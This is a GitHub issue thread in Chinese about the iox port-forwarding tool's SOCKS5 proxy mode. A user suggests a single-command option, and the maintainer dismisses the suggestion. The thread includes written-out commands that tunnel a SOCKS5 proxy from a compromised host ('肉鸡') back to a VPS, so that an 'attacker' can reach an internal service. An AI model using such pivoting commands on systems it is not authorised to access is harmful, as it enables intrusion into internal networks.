### ISSUE TITLE
关于proxy代理模式

### ISSUE THREAD

**Issue by D1sAbl4** [EddieIvan01/iox#13]
### 按照例子
在vps:
`./iox proxy -l 9999 -l 1080`

在被控肉鸡:
`./iox proxy -l 1080`

然后在`./iox proxy -r 1.1.1.1:9999` 要是能设计成`./iox proxy -l 1080 -r 1.1.1.1:9999 ` 本地开启sokcs5服务并转发到远程, 一条命令不就更加清晰了嘛

==================================

然而使用端口转发的socks服务更加稳定：
vps:
`iox fwd -l 9999 -l 1080`

肉鸡： 
`iox proxy -l 1080 ` 启动socks5服务
`iox fwd -r 127.0.0.1:1080 -r 1.1.1.1:9999`  将本地socks5服务转发到vps

攻击者:
`curl -x "socks5://1.1.1.1:1080" -s -k http://10.0.0.1:9200`

**Comment by EddieIvan01** [comment]
没看懂

**Comment by D1sAbl4** [comment]
> 没看懂

你假设我这例子中vps的ip是1.1.1.1 应该能明白吧

**Comment by EddieIvan01** [comment]
分割线下面的我明白，本身支持这样的级联，但需要多一条命令，也没有`proxy -r`稳定

分割线上面的，没看懂

**Comment by D1sAbl4** [comment]
> 分割线下面的我明白，本身支持这样的级联，但需要多一条命令，也没有`proxy -r`稳定
> 
> 分割线上面的，没看懂

就是在肉鸡上开启proxy模式的时候，要是能使用iox proxy -l 1080 -r 1.1.1.1:9999 一条命令能解决就好了, 我试了只能不能这样做, 按照例子来先iox proxy -l 1080开一个socks服务，然后第二条: iox proxy -r 1.1.1.1:9999转到vps 这样就感觉很不清晰

**Comment by D1sAbl4** [comment]
像`iox proxy -l 1081`   `iox proxy -l 1082` ,有多个socks服务的情况下, 
`iox proxy -r 1.1.1.1:9999` 这个时候转发的又是那个端口的服务, 会发生什么情况呢

**Comment by EddieIvan01** [comment]
你没明白怎么用，认真读README
